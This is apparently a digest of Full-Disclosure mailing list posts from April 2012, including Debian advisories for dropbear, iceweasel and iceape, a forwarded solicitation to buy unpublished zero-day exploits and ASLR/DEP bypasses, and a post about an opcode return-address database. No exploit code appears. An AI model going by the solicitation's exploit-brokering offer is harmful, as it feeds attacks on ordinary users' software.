  IMHO, anyone who willingly, knowingly places customer data at risk
  by inviting attacks on their production systems is playing a very
  dangerous game. There is no guarantee that a vuln discovered by a
  truly honest researcher couldn't become a weapon for the dishonest
  researcher through secondary discovery
 
 I'm not sure I follow. Are you saying that the dishonest researcher
 will not try to find vulnerabilities if there is no reward program
 for
 the honest ones?

He made a good example of a Slippery Slope.

-- 
Ramon de C Valle / Red Hat Product Security Team


[Full-disclosure] Hacking WolframAlpha

2012-04-24 Thread Adam Behnke
Sharing source code with peers is one thing; sharing secrets over a public
medium is another. The all-seeing eye of Google has no mercy, and once the
secret has been seen, indexed, and copied to clone sites, it is no longer a
secret. Now combine the search power of Google with the computational power
of WolframAlpha and the results are limitless! It's raining data from these
saturated clouds, and you just need to hold out your hands for a taste:
http://resources.infosecinstitute.com/hacking-wolframalpha/







[Full-disclosure] [SECURITY] [DSA 2456-1] dropbear security update

2012-04-24 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2456-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
April 23, 2012 http://www.debian.org/security/faq
- -

Package: dropbear
Vulnerability  : use after free
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-0920

Danny Fullerton discovered a use-after-free in the Dropbear SSH daemon,
resulting in potential execution of arbitrary code. Exploitation is
limited to users who have been authenticated through public key
authentication and for whom command restrictions are in place.

For the stable distribution (squeeze), this problem has been fixed in
version 0.52-5+squeeze1.

For the testing distribution (wheezy), this problem has been fixed in
version 2012.55-1. 

For the unstable distribution (sid), this problem has been fixed in
version 2012.55-1. 

We recommend that you upgrade your dropbear packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAk+XCosACgkQXm3vHE4uylrKpQCfZpU4eKxztqi8zGzsAKdxzhLV
kOcAoIshssbewzstn+sNTIJyNP7MJ10i
=uWaI
-END PGP SIGNATURE-



Re: [Full-disclosure] Fwd: Vulnerability research and exploit writing

2012-04-24 Thread Elazar Broad
Ferenc,
 I got one as well a few weeks ago. I suspect you are correct in your 
assumption.

elazar

On Tuesday, April 24, 2012 at 4:03 AM, Ferenc Kovacs tyr...@gmail.com wrote:

Hi,

Anybody else got this message? I think they are spamming the
subscribers/regular participants of the list.

-- Forwarded message --
From: steve ruskin ruskin.st...@gmail.com
Date: Tue, Apr 24, 2012 at 9:56 AM
Subject: Vulnerability research and exploit writing
To: tyr...@gmail.com



Hi,

Trust all is well. I saw your experience in the field of vulnerability and
exploit research and we have a scheme in our company to collaborate with
researchers all over the world where we pay them on research done by them.
Our interest is exploits which run over Windows 7, Snow Leopard with
applications such as MS Office, Adobe, Browsers, Media Player, Notepad etc
along with native OS exploits as well as iPhone, BlackBerry exploits. These
exploits should be unpublished though the vulnerability may be public. We
also have requirements to help us do ASLR and DEP bypass for exploits
researched by us.

Once you let us know about your skills and ideas we can provide you with
our empanelment form via which you can register. We will look forward to
your prompt response.

Warm Regards,

Steve Ruskin

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu


[Full-disclosure] [SECURITY] [DSA 2457-1] iceweasel security update

2012-04-24 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2457-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
April 24, 2012 http://www.debian.org/security/faq
- -

Package: iceweasel
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-0467 CVE-2012-0470 CVE-2012-0471 CVE-2012-0477 
 CVE-2012-0479

Several vulnerabilities have been discovered in Iceweasel, a web
browser based on Firefox. The included XULRunner library provides
rendering services for several other applications included in Debian.

CVE-2012-0467
 
   Bob Clary, Christian Holler, Brian Hackett, Bobby Holley, Gary
   Kwong, Hilary Hall, Honza Bambas, Jesse Ruderman, Julian Seward,
   and Olli Pettay discovered memory corruption bugs, which may lead
   to the execution of arbitrary code.

CVE-2012-0470

   Atte Kettunen discovered that a memory corruption bug in
   gfxImageSurface may lead to the execution of arbitrary code.

CVE-2012-0471

   Anne van Kesteren discovered that incorrect multibyte octet
   decoding may lead to cross-site scripting.

CVE-2012-0477

   Masato Kinugawa discovered that incorrect encoding of
   Korean and Chinese character sets may lead to cross-site scripting.

CVE-2012-0479

   Jeroen van der Gun discovered a spoofing vulnerability in the
   presentation of Atom and RSS feeds over HTTPS.

For the stable distribution (squeeze), this problem has been fixed in
version 3.5.16-14.

For the unstable distribution (sid), this problem has been fixed in
version 10.0.4esr-1.

For the experimental distribution, this problem will be fixed soon.


We recommend that you upgrade your iceweasel packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAk+XDkoACgkQXm3vHE4uylqfngCaAt6fHj+dr/zvoi0c4J3skHfR
ftcAoLCxfj+mh6m0Uv0lJ734BoVYAYmd
=m0na
-END PGP SIGNATURE-



Re: [Full-disclosure] Fwd: Vulnerability research and exploit writing

2012-04-24 Thread Michal Zalewski
 Our interest is exploits which run over Windows 7, Snow Leopard with
 applications such MS Office, Adobe, Browsers, Media Player , Notepad etc

Well, good thing I have a stash of Notepad 0-days.

Most of them involve you saving a snippet of text as evil.bat and
clicking on it, though.

/mz



[Full-disclosure] [SECURITY] [DSA 2548-1] iceape security update

2012-04-24 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2458-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
April 24, 2012 http://www.debian.org/security/faq
- -

Package: iceape
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-0455 CVE-2012-0456 CVE-2012-0458 CVE-2012-0461 
 CVE-2012-0467 CVE-2012-0470 CVE-2012-0471 CVE-2012-0477 
 CVE-2012-0479

Several vulnerabilities have been found in the Iceape internet suite,
an unbranded version of Seamonkey:

CVE-2012-0455

   Soroush Dalili discovered that a cross-site scripting countermeasure
   related to Javascript URLs could be bypassed.

CVE-2012-0456

   Atte Kettunen discovered an out of bounds read in the SVG Filters,
   resulting in memory disclosure.

CVE-2012-0458

   Mariusz Mlynski discovered that privileges could be escalated through
   a Javascript URL as the home page.

CVE-2012-0461

   Bob Clary discovered memory corruption bugs, which may lead to the
   execution of arbitrary code.

CVE-2012-0467
 
   Bob Clary, Christian Holler, Brian Hackett, Bobby Holley, Gary
   Kwong, Hilary Hall, Honza Bambas, Jesse Ruderman, Julian Seward,
   and Olli Pettay discovered memory corruption bugs, which may lead
   to the execution of arbitrary code.

CVE-2012-0470

   Atte Kettunen discovered that a memory corruption bug in
   gfxImageSurface may lead to the execution of arbitrary code.

CVE-2012-0471

   Anne van Kesteren discovered that incorrect multibyte octet
   encoding may lead to cross-site scripting.

CVE-2012-0477

   Masato Kinugawa discovered that incorrect encoding of
   Korean and Chinese character sets may lead to cross-site scripting.

CVE-2012-0479

   Jeroen van der Gun discovered a spoofing vulnerability in the
   presentation of Atom and RSS feeds over HTTPS.

For the stable distribution (squeeze), this problem has been fixed in
version 2.0.11-11

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your iceape packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAk+XECIACgkQXm3vHE4uylrSLwCgsWqViAl/x/7dWbnFPGvkDb0G
TVUAn2RnbfqVYXwGnHJ/deHKbzjrGy2L
=8bek
-END PGP SIGNATURE-



[Full-disclosure] Opcodes Database Revival

2012-04-24 Thread Jerome Athias
Hi List,

WANTED: one (free/available) .Net programmer

I did a research on Windows Opcodes (return addresses) database
https://en.wikipedia.org/wiki/Metasploit_Project#Opcode_Database
http://www.blackhat.com/html/bh-eu-12/bh-eu-12-briefings.html

My tools/results should be soon published (BlackHat website /
Packetstorm...)

Anyway, to publish the source code, I would like to collaborate with a
.Net programmer to share better/cleaner/more understandable code.

Anyway, in short it is an update of http://insecure.org/stf/smashstack.html


-- 
Jerome Athias - NETpeas
VP, Director of Software Engineer
Palo Alto - Paris - Casablanca

www.netpeas.com
-
Stay updated on Security: www.vulnerabilitydatabase.com

The computer security is an art form. It's the ultimate martial art.


